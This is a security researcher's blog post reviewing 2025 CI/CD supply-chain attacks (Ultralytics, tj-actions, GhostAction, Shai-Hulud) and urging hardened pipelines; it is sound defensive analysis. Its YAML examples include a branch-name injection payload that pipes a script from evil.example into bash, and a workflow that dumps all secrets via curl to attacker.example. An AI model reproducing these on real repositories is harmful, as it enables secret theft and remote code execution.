
Defensive Research, Weaponized: The 2025 State of Pipeline Security


December 10th 2025, by François Proulx, VP of Security Research @ BoostSecurity.io

TL;DR: 2025 didn’t give us a new, magical Supply Chain vuln class; instead it gave us attackers who finally started reading our manuals.

From Ultralytics’ pull_request_target 0‑day (where a BreachForums post indicates they used our own poutine scanner to find it) through Kong, tj-actions, GhostAction, Nx, GlassWorm and both Shai‑Hulud waves, the common pattern wasn’t typosquats but Pipeline Parasitism: living off CI/CD, maintainer accounts and developer endpoints using the same tools and patterns we published to defend them.

The vuln mechanics stayed boring: shell injections and over‑privileged tokens. But they were operationalized with worms, invisible Unicode payloads, blockchain C2, and even wiper failsafes.

Thankfully, platforms are finally improving, yet “pwn request” is here to stay; the only sustainable answer is to treat pipelines as production systems and publish future research assuming adversaries are our most diligent readers!

Table of Contents

Introduction: The Uncomfortable Baseline

Chapter 1: The turning point: Ultralytics & BreachForums

Chapter 2: Pipeline Parasitism goes mainstream

Chapter 3: Invisible Enemies: Unicode & GlassWorm

Chapter 4: Ecosystem Scale: The Shai-Hulud Worms

Chapter 5: Analysis: Research as a Requirements Document

Conclusion: Defensible by Design

Introduction: The Uncomfortable Baseline

In 2025, the unsettling part wasn’t that Supply Chain attacks suddenly became possible: it was that they started to look uncomfortably familiar. Campaign after campaign read like someone had taken years of CI/CD vulnerability research, SLSA Threat Model diagrams, and conference exploitation demos, then simply ran them in production.

This article is NOT an end-of-year “Top 10 Most Bad Ass Breaches” recap. It’s the story of a pivot point: the year when pipeline hardening guides, LOTP talks, and Open Source scanners stopped being just defensive artifacts and became part of the offensive toolkit. If you spent 2023-2024 mapping how PRs, bots, and build runners could go wild, 2025 felt like watching those PTSD-inducing Tabletop whiteboard scenarios replayed at ecosystem scale.

To understand why, we have to start with the uncomfortable baseline: we already knew the foundations were fragile. I hate to say it, but I saw that movie playing in my head several years ago as I exploited my first “pwn request” and had my own “Oh Shit!” moment.

Fragile foundations, well‑documented

Filippo Valsorda captured the mood of 2025 in his essay “State of Supply Chain Compromise”. The thesis was simple and uncomfortable: our ecosystem is structurally fragile, compromise is inevitable, and we should stop pretending otherwise.

By the time his essay circulated through Blue Team Slack channels and newsletters, a loose coalition of researchers and builders had already spent the better part of the past couple of years stress‑testing CI/CD systems:

  • Exposing how GitHub Actions, GitLab CI, Tekton, CircleCI and friends routinely run untrusted Pull Request code from forks with overly privileged secrets.
  • Demonstrating Poisoned Pipeline Execution (PPE) and “pwn request” patterns where a single Pull Request (or GitHub Issue / Comment) often trivially allows an attacker to exfiltrate secrets (signing keys, tokens, etc.) and pivot to compromise artifact registries and release pipelines.
  • Publishing tooling and methodologies to make this repeatable at scale.

A large portion of the work we did was intentionally public. We wanted maintainers and platform teams to see how bad things were. We responsibly disclosed hundreds of those vulnerabilities, so many, in fact, that we had to build an agentic pipeline to triage them, automate validation, and generate draft reports.

We Open Sourced scanners like poutine to statically catch unsafe workflow patterns. We wrote articles like Weaponizing Dependabot to explain how seemingly benign automation can be chained into high‑impact attacks, and Split‑Second Side Doors to show how Bot‑Delegated TOCTOU in CI can break your core Threat Model assumptions even when humans think they are “approving” safe changes.

We talked at several conferences, we were invited on podcasts, we created a whole CTF training. Many of us were early contributors and cheerleaders for efforts like SLSA’s Source and Build tracks, trying to drag pipelines out of the “2005 PHP Web App” era of secure coding and into something more principled.

Defenders, it turns out, weren’t the only ones listening.

Chapter 1: The turning point: Ultralytics & BreachForums


Figure 1: The smoking gun. Threat actors explicitly citing our defensive tools.

Every field has a moment where a vague concern crystallizes into hard evidence. For CI/CD Supply Chain security, that moment came for me in December 2024 with the Ultralytics incident.

A few months earlier, during routine research, we had flagged a painfully obvious injection bug in ultralytics/actions, a GitHub Action used in the YOLOv5 ecosystem. The pattern was depressingly familiar:

  • A pull_request_target workflow.
  • Attacker-controlled head branch name interpolated straight into a Bash command: a classic shell injection.
  • A GitHub Personal Access Token loaded into memory during the build.

A textbook “pwn request” PPE scenario. We made a note to come back to it. Other fires were burning.
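
If you have never seen one of these in the wild, here is a minimal, hypothetical sketch of the anti‑pattern (all names invented; this is not the actual ultralytics/actions workflow):

```yaml
# Hypothetical “pwn request” workflow; every name here is illustrative.
name: pr-format
on:
  pull_request_target:            # privileged trigger: runs with base-repo secrets
    types: [opened, synchronize]

jobs:
  format:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # checks out untrusted fork code
      - name: Announce branch
        env:
          GH_TOKEN: ${{ secrets.PERSONAL_ACCESS_TOKEN }}   # now sitting in process memory
        run: |
          # DANGER: github.head_ref is the fork's branch name, chosen by the
          # attacker. Template expansion happens before Bash runs, so a branch
          # named x;{curl,-s,evil.example/x.sh}|bash (brace expansion stands in
          # for the spaces and colons refs can't contain) becomes code execution.
          echo "Formatting branch ${{ github.head_ref }}"
```

The boring fix, passing untrusted fields through environment variables instead of template‑expanding them into `run:` blocks, comes up again with the Nx incident below.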

In early December, news broke: Ultralytics’ PyPI package had been trojanized. A compromised GitHub Actions workflow had exfiltrated publishing credentials and shipped cryptomining payloads to unsuspecting ML users.

That was bad. The next discovery was worse.

Looking at Dark Web chatter using Flare, we found a freshly created BreachForums account. The actor’s posting history looked… concise:

  • A first post: OpSec 101 🤦🏻‍♂️.
  • A second post, 12 hours before the Ultralytics compromise, dropping the exact 0‑day chain against ultralytics/actions, complete with references to our own LOTP and poutine explaining how the vulnerability had been found.
  • A third post, soon after the incident, bragging that someone had used “PRs to leak secrets from build pipelines,” dropped a Monero miner, caused chaos, but made little money.
  • The account never logged in again.

This wasn’t vague speculation about “attackers probably read our blogs.” This was a threat actor explicitly crediting research tools and methodology, weaponizing it almost verbatim, and then disappearing.

It was the smoking gun.

From hackathon frustration to pipeline telemetry

We were frustrated. We had seen the bug months before. Our intuition was that it could have been caught even earlier, by looking at the ecosystem from the outside, correlating suspicious workflow changes, package publishes, and maintainer activity.

So we did what engineers do when they’re annoyed: we built more plumbing.

Over a hackathon, we stitched together what became our Package Threat Hunter pipeline, ingesting the GitHub public events firehose, layering on some secret sauce, and trying to catch Build Pipeline exploits “in the act” instead of reverse‑engineering them weeks later.

Ten days later, Kong’s Kubernetes Ingress Controller incident happened: an unauthorized 3.4.0 release pushed through their CI, using legitimate build scripts and signing paths, but shipping a cryptominer.

Package Threat Hunter had captured the whole thing, minute by minute.

That experience locked in a mental model that 2025 would keep reinforcing: the interesting compromises were no longer simple typosquats. They were pipeline‑centric operations, where attackers:

  1. Find or create a CI/CD foothold.
  2. Reuse as much of the legitimate release machinery as possible.
  3. Blend their payloads into official‑looking artifacts and ecosystem‑trusted channels.

And increasingly, they were doing it using our own research as a field guide.

Chapter 2: Pipeline Parasitism goes mainstream

The first quarter of 2025 made it clear that Ultralytics and Kong weren’t anomalies.

Actions on Actions: tj-actions/changed-files

In March, we saw what happens when an attacker decides to treat GitHub Actions themselves as a transitive Supply Chain.

By compromising the maintainer account for tj-actions/changed-files, a hugely popular Action used in tens of thousands of workflows, an adversary was able to backdoor all existing versions, injecting a one‑liner shell payload that ran in the context of each consumer’s workflow.

This wasn’t subtle. It was “GitHub‑Actions‑on‑GitHub‑Actions”, a meta Supply Chain attack squarely aligned with the PPE patterns offensive researchers had been demonstrating for years. A popular vulnerable GitHub Action is the holy grail; the blast radius can be gigantic. It’s a side-door 0-day into every workflow that depends on it.
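
It is also why every hardening guide keeps hammering on pinning Actions to a full commit SHA instead of a mutable tag; a quick sketch (the SHA below is a placeholder, not a real tj-actions commit):

```yaml
steps:
  # Mutable reference: the tag can be repointed after a maintainer compromise,
  # which is exactly how the backdoored code reached consumers here.
  - uses: tj-actions/changed-files@v44

  # Immutable reference: a full commit SHA cannot be silently swapped out.
  # (Placeholder SHA, for illustration only.)
  - uses: tj-actions/changed-files@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
```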

Figure 2: The meme from our Under The Radar talk slide deck (early 2024), now reality

GitHub’s response was equally telling: they took the unusual step of globally yanking tags, knowingly breaking builds to cut off impact. That’s the kind of move platforms make when they recognize they’re dealing with systemic, not local, risk.

GhostAction: workflows as malware

By September, GhostAction pushed the idea further. Here, the “malware” wasn’t in a dependency: it was a GitHub Actions workflow.

Compromised accounts (account takeovers, ATO) received a malicious YAML file wired to run on every push and pull request. The logic was simple but devastating: on every execution, the workflow walked through all the secrets it could reach (GitHub, Docker Hub, NPM, PyPI, and cloud providers), bundled them up, and exfiltrated them to attacker‑controlled infrastructure.
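
A defanged sketch of the shape of such a workflow follows; reporting on the campaign indicates the attackers enumerated and hardcoded secret names per repository, but GitHub’s `toJSON(secrets)` expression is the generic one‑liner form of the same idea:

```yaml
# Defanged GhostAction-style sketch: to the CI platform, this is just
# another legitimate job definition.
name: ci
on: [push, pull_request]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Collect and ship
        env:
          LOOT: ${{ toJSON(secrets) }}   # serializes every secret this job can reach
        run: |
          # Exfiltration endpoint defanged, for obvious reasons.
          curl -s -X POST --data "$LOOT" https://attacker.example/collect
```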

GitGuardian’s telemetry later showed hundreds of accounts and thousands of secrets impacted. More importantly, GhostAction behaved like a crude GitHub‑native worm. Once the malicious YAML landed in a few places, new tokens were exfiltrated and the cycle repeated.

Nx and the s1ngularity campaign

The Nx incident followed a similar script to Kong, with a twist. The root cause was depressingly familiar: a flawed GitHub Actions workflow wired to pull_request_target that shoved unsanitized PR title and body straight into a shell, giving attackers high‑privilege RCE in the repo. The gut punch came when Adnan Khan pointed out that this workflow hadn’t been hand‑written at all: it was generated and committed by Claude Code. In other words, the attacker walked through a CI backdoor that an AI had casually stamped into the codebase for them before chaining other AI CLIs for recon in the malware itself. This is exactly why we’ve been wiring tools like poutine into MCP servers and code assistants: if you don’t put a LOTP‑aware linter in the loop, your “helper” can quietly gift attackers the perfect pull_request_target 0‑day.
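
For the record, the boring fix that such a linter pushes you toward looks something like this (a sketch, with hypothetical names, not Nx’s actual remediation):

```yaml
# Hardened counterpart to the Nx-style bug: untrusted PR fields are passed
# through environment variables, never template-expanded inside run: blocks.
on:
  pull_request_target:
    types: [opened]

permissions:
  contents: read                # and nothing the job doesn't actually need

jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Log title safely
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}  # expanded outside the shell
        run: |
          printf 'Triaging: %s\n' "$PR_TITLE"   # quoted variable: data stays data
```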

Grafana: canaries in the CI coal mine

If Nx was a reminder that AI can write you a perfect CI 0‑day, Grafana was the reminder that good instrumentation can still save you.

In April 2025, Grafana Labs had their own pull_request_target‑powered PPE: an insecure workflow let an attacker run a carefully crafted branch name through a shell, exfiltrating environment variables and a handful of credentials from a GitHub Actions job. On paper, that’s the same story as Ultralytics or Nx, a classic pwn‑request bug wired straight into CI.

The difference is how it ended. Grafana had seeded their environment with canary tokens, high‑value‑looking AWS keys and other decoys whose only purpose was to scream if anyone touched them. When the attacker validated one of those keys, Grafana’s team got an immediate page, swarmed the incident, rotated everything, and confirmed there was no production or customer impact. They followed up by hardening their workflows, leaning on tools like Zizmor (a scanner in the same family as poutine that catches vulnerable Actions at scale), and later wrote publicly about how they design and place canaries.

Grafana’s experience is worth calling out because it shows that Pipeline Parasitism isn’t automatically a death sentence for a well‑instrumented, well‑staffed project. Most small, understaffed but wildly popular dependencies will never have a dedicated SRE on pager duty; expecting them to hand‑craft canaries and incident playbooks is wishful thinking. The lesson here is less “everyone should do what Grafana did” and more “this kind of tripwire should exist as a platform‑level feature”. Registries, CI providers, or security tooling can make it cheap and mostly automatic for the long tail, not just a bespoke trick reserved for the Grafanas of the world.
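
For teams that do want the Grafana treatment today, the mechanics are refreshingly simple; a sketch, assuming the decoy values come from a canary service such as canarytokens.org or in‑house tooling (secret names hypothetical):

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      # Decoys: they look like high-value AWS credentials, are never used by
      # any real step, and page the on-call the moment anyone validates them.
      AWS_ACCESS_KEY_ID: ${{ secrets.CANARY_AWS_ACCESS_KEY_ID }}
      AWS_SECRET_ACCESS_KEY: ${{ secrets.CANARY_AWS_SECRET_ACCESS_KEY }}
    steps:
      - uses: actions/checkout@v4
      - run: make build
```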

Chapter 3: Invisible Enemies: Unicode & GlassWorm

As defenders got better at spotting crude pipeline abuse, attackers adapted in two directions: invisibility and persistence. Two campaigns in particular, the first Unicode‑steganography NPM malware and GlassWorm, felt like they were written specifically to humiliate our assumptions about what “obvious” malware looks like.

The os-info-checker-es6 family looked like yet another forgettable system‑info helper until fellow researchers pulled it apart and realized the malicious logic wasn’t just obfuscated, it was missing from the tools we trusted to show us code. The payload was woven through Unicode Private Use Area (PUA) and zero‑width characters in a way that made the bad branches completely invisible in VS Code, vim, Emacs, and GitHub’s web diff. You could review the file line by line and never see the teeth. That shock is what led us to build an Open Source tool we called puant (“stinky” in French), whose only job is to sniff out suspicious PUA and zero‑width usage so maintainers have at least a fighting chance of noticing when a diff is lying to them. Pair that with a C2 channel that hid commands and exfiltrated data inside Google Calendar events, and you get tradecraft that feels a lot closer to Lazarus Group / “Contagious Interview”‑style operations than to a bored cryptominer.
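
If you want a crude CI‑level tripwire in the same spirit before reaching for puant itself (a sketch, not puant’s actual implementation; legitimate uses of these characters exist, so treat hits as “review”, not “malware”):

```yaml
- name: Flag invisible Unicode
  run: |
    # Fail the build if tracked sources contain zero-width or Private Use
    # Area characters that most editors render as nothing at all.
    if grep -rPn '[\x{200B}\x{200C}\x{200D}\x{2060}\x{FEFF}\x{E000}-\x{F8FF}]' src/; then
      echo '::error::Invisible/PUA Unicode found; inspect the flagged lines in a hex dump'
      exit 1
    fi
```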

GlassWorm adapted this technique to target VS Code and Open VSX publishers directly. They used the invisible Unicode trick to hide activation logic within benign-looking extensions, but paired it with a sophisticated worming capability that used stolen tokens to infect the maintainers’ other projects. Perhaps most alarmingly, they hardened their infrastructure by using the Solana blockchain for C2 communication, ensuring their command channel remained up even if their servers were nuked.

Taken together, the first Unicode‑PUA NPM malware and GlassWorm were a visceral reminder that “just read the diff” or “just check the extension reviews” is no longer a sufficient review strategy, and that developer endpoints (IDEs and extension ecosystems) are now first‑class targets in their own right, not collateral damage.

Chapter 4: Ecosystem Scale: The Shai-Hulud Worms

By late summer, attackers stopped sniping individual packages and went straight after the humans who maintain the building blocks of the JavaScript ecosystem. The Great NPM Heist against the extremely popular, critical packages maintained by Qix (chalk, debug, ansi-styles, and many more) was pure social engineering: a convincing phishing campaign spoofing NPM support and a fake TOTP management page were enough to turn a single maintainer account into a distribution hub for malicious versions of dozens of core libraries. The payload was a crypto stealer quietly swapping wallet addresses in any app that handled them. It never fully realized its potential, but it proved the point: compromise the right person, and you can poison billions of weekly installs.

The first Shai‑Hulud wave took that insight and automated it. Instead of using a stolen NPM token to backdoor a single package, the worm’s postinstall hook enumerated every package owned by the victim maintainer, injected a huge obfuscated payload, and republished new versions. Exfiltration flowed into GitHub repositories acting as dropboxes for stolen tokens and secrets. Within days, “a few compromised packages” had become hundreds of trojanized libraries and thousands of downstream repos touched: a maintainer‑level worm, not a one‑off incident.

Shai‑Hulud 2.0 was the same concept turned up to eleven. Compromised packages dropped a preinstall script that installed or located the Bun runtime and spawned a heavily obfuscated bun_environment.js. On any machine with an NPM token, the worm walked the maintainer’s entire portfolio, backdooring and republishing packages en masse and spreading across several hundred packages. The payload was tuned for developer endpoints and CI: it hunted GitHub PATs, NPM credentials, cloud keys, and SSH keys, then exfiltrated them via public GitHub repos literally branded “Sha1‑Hulud: The Second Coming,” often mixing data from multiple victims.

On machines with enough access, Shai‑Hulud 2.0 went further and registered the host as a GitHub Actions self‑hosted runner, wiring in attacker‑controlled workflows so that revoking NPM tokens wasn’t enough: you now had a durable, GitHub‑mediated RCE path back into the victim’s laptop. And when it couldn’t steal or persist (no network, no usable tokens), it sometimes fell back to a blunt option: recursively deleting everything writable under the user’s home directory. At that point you’re not dealing with “just” a Supply Chain compromise, but with an ecosystem worm, a developer‑endpoint infostealer, a GitHub‑proxied backdoor, and a wiper rolled into one, all rooted in the same lesson as the Heist: maintainers are the real root of trust.
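
One unglamorous mitigation falls straight out of those mechanics: stop letting the registry execute code at install time. On the CI side that can be as small as the step below (a sketch; some packages legitimately need lifecycle scripts, so treat it as a default with explicit exceptions):

```yaml
- name: Install dependencies without lifecycle scripts
  # Blocks the preinstall/postinstall hooks both Shai-Hulud waves used as
  # their execution vector; run genuinely required build steps explicitly.
  run: npm ci --ignore-scripts
```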

Chapter 5: Analysis: Research as a Requirements Document

Looking across Ultralytics, Kong, tj-actions, GhostAction, Nx, GlassWorm, the Great NPM Heist, and both Shai‑Hulud waves, a pattern emerges on the pipeline and maintainer side of the house:

  1. The core vulnerability classes are not new. They are the same boring primitives we have been talking about for a decade: unsafe string interpolation into shells, over‑privileged tokens and runners in CI, maintainer account takeover, and sketchy package install hooks combined with excessive post‑publish trust.
  2. What’s new is the level of operationalization. Attackers now use tooling to scan for the exact anti‑patterns defenders look for, build worm‑like propagation mechanisms across maintainer portfolios and ecosystems, and design obfuscation and C2 channels specifically to defeat human review and commodity detection.
  3. Our own research has become a roadmap for this specific class of attacks. Blog posts and talks about PPE, Dependabot abuse, and Bot‑Delegated TOCTOU lay out exactly how a misconfigured pull_request_target or overeager bot can become an RCE and secrets factory. Open Source tools like poutine or Gato‑X encode those patterns in code, making it trivial to scan large swaths of GitHub for promising CI/CD anti‑patterns. Hardening guides and disclosure timelines document which combinations of triggers, permissions, and secrets lead to which impacts, effectively prioritizing targets for anyone willing to read.

Campaigns like rand-user-agent or os-info-checker-es6 live in a slightly different bucket: they were born malicious, crafted from day one as watering‑hole artifacts (tiny helpers, convenience libraries, “just‑trust‑me” interview tools) rather than compromises of long‑standing, trusted packages. They don’t need our research to exist; registry incentives and the economics of “npm install whatever Stack Overflow says” are enough.

But even there, the ecosystem reaction is shaped by the same research. The reason we recognized the Unicode PUA trick, built tools like puant, and could talk about blockchain‑backed C2 with any precision is because the community has spent years poking holes in how we review, ship, and consume code.

Attackers are doing what we would do in their position: reading everything, cloning everything, scripting everything. That doesn’t mean we should stop publishing research. It does mean we need to internalize a hard truth: there is no longer a clean line between “defensive” and “offensive” Supply Chain research.

Every hardening guide is also a gap analysis for the next campaign. Every proof‑of‑concept is a template. Every detection rule is a hint about how to evade the next version.

Conclusion: Defensible by Design

The good news is that the ecosystem is responding. GitHub is on the verge (as of early December 2025) of partially tightening the Threat Model around pull_request_target and branch‑protected environments, chipping away at the “easy mode” PPE paths that powered Ultralytics and many copycats. NPM has changed token policies, including expiration for publish tokens, directly in response to the first Shai‑Hulud wave, making stolen publish tokens slightly less useful. Extension marketplaces are starting to treat publisher accounts and signing keys as critical infrastructure, not just UX plumbing.

These changes matter. Some of the most egregious low‑hanging fruit is finally disappearing.

But as Clint Gibler put it in the TL;DRsec #307 newsletter referring to Shai‑Hulud 2.0, there’s a different kind of unease too: after each ecosystem‑level incident, we spin up a flurry of >80% overlapping vendor posts that can feel, in his words, like “a lot of duplicate work,” more marketing than new signal. The real opportunity cost isn’t just readers’ attention, it’s all the expert time that could be going into longer‑term, solve‑this‑class‑of‑problem work instead of re‑describing the same campaign every few months.

Right now, most CI/CD platforms are effectively RCE As A Service. We’ve handed every repo a Swiss‑army knife of triggers, runners, and integrations, plus a Threat Model you only really understand if you treat the docs as light bedtime horror. There are too many choices, too many sharp edges, and too many caveats that only surface after someone chains them into a real attack.

That’s barely acceptable for well‑funded product teams; it’s untenable for the tiny, under‑resourced Open Source projects that end up underpinning half the internet. We can’t keep playing the “SSO tax” game where enterprise‑grade detection and response sits behind paywalls while the weekend pet project, the one that quietly becomes that XKCD comic everyone loves to share about a single unpaid maintainer holding up the world, gets the most dangerous defaults and the fewest guardrails. We all keep shrugging and reposting the joke instead of fixing the incentives.

If 2025 was the year attackers industrialized Living Off The Pipeline, 2026 needs to be the year we start designing pipelines and ecosystems that are defensible by design.

That means more batteries‑included, paved‑road platforms and fewer sharp edges, especially for Open Source: safer defaults, opinionated workflow behavior, and built‑in tripwires that make the secure path the easy path instead of an expert‑only side quest.

That points to a few concrete shifts:

  1. Treat pipelines as production systems, not glue code. Model GitHub Actions, GitLab CI, Tekton and friends as always‑on RCE‑as‑a‑Service platforms, not scripting conveniences; apply real Threat Modeling, enforce least privilege on tokens and runners, and separate untrusted PR evaluation from trusted release processes instead of letting everything run in one amorphous “build” stage (see the sketch after this list).
  2. Harden the human perimeter around maintainers and developers. Make hardware keys and phishing‑resistant MFA table stakes for registry and marketplace accounts, give maintainers security awareness that matches their actual risk profile, and run endpoint protection tuned for developer workflows rather than generic office laptops.
  3. Invest in ecosystem‑level telemetry and coordination. Share behavioral patterns for pipeline‑centric attacks across vendors, build rapid cross‑registry response muscle for maintainer compromises, and support community efforts like open malware databases (OpenSSF / OSV / OSMDB), sandboxing infrastructure, and canary‑style tripwires that can be baked into CI and registries themselves, the kind of instrumentation that helped Grafana turn a live pull_request_target exploit into a quickly contained non-event, but now made cheap and mostly automatic for the long tail of tiny, heavily‑used packages.
  4. Publish research with an eye toward abuse. Focus proofs‑of‑concept on classes of issues rather than turnkey exploit chains, pair offensive insights with concrete, implementable mitigations, and assume by default that adversaries will be your most diligent readers.
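
As a starting point for the first item, a minimal least‑privilege layout might look like this (a sketch; job names and scripts are hypothetical):

```yaml
permissions: {}                  # workflow-wide default: zero permissions

jobs:
  test-untrusted-pr:             # evaluates fork code with nothing worth stealing
    runs-on: ubuntu-latest
    permissions:
      contents: read
    steps:
      - uses: actions/checkout@v4
      - run: make test           # no secrets exposed to this stage

  release:                       # trusted stage, gated to protected branches
    if: github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    permissions:
      contents: write
      id-token: write            # short-lived OIDC instead of long-lived cloud keys
    steps:
      - uses: actions/checkout@v4
      - run: ./release.sh
```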

Finally, we should keep doing what worked best in 2025: collaborating as humans.

As an olive branch to ourselves, we could make that collaboration a little more intentional: a small, vendor‑neutral Signal group where the people who actually reverse this stuff, ship the PoCs, and write the hardening guides can compare notes outside of weeks where marketing puts us in the line of fire. A place to trade weird telemetry, half‑baked ideas, and “does this look like the next Shai-Hulud or am I just tired?” questions, ideally without accidentally re‑creating a "SignalGate" of our own by inviting the threat actors into the chat 🤣.

The reason many of these campaigns were understood and contained as quickly as they were is that individuals across companies and communities quietly shared intel. People like Adnan Khan pushing the boundaries of CI/CD exploitation so others could understand the risk. Rami McCarthy sending a friendly “URGENT PSA - [redacted] got hit by the Nx issue. Revoke everything. Sorry!” DM when telemetry suggested one of our own employees had been hit. William “Woody” Woodruff keeping tools like Zizmor sharp so GitHub workflow bugs don’t stay bugs for long. Paul McCarty curating the Open Source Malware database and building tools like undelete that let us see what really happens on shady Asian NPM mirrors. Charlie Eriksen being one of the first on scene reversing new blobs so the rest of us don’t have to start from raw hex. Aviad Hahami et al. doing a massive forensics job retracing the first innings of complex campaigns like tj-actions. Analysts painstakingly teasing signal out of obfuscated bundles. Maintainers disclosing painful compromises in public so others could learn.

The irony of 2025 is that while attackers were busy weaponizing our research, the most effective defense was still relationships: Signal groups, DMs, and late‑night calls where we compared notes and turned isolated incidents into a coherent picture.

If we do this right, the story we tell a year from now won’t be “look how bad Shai‑Hulud 3.0 was.”

It will be: attackers kept reading our manuals and it stopped helping them.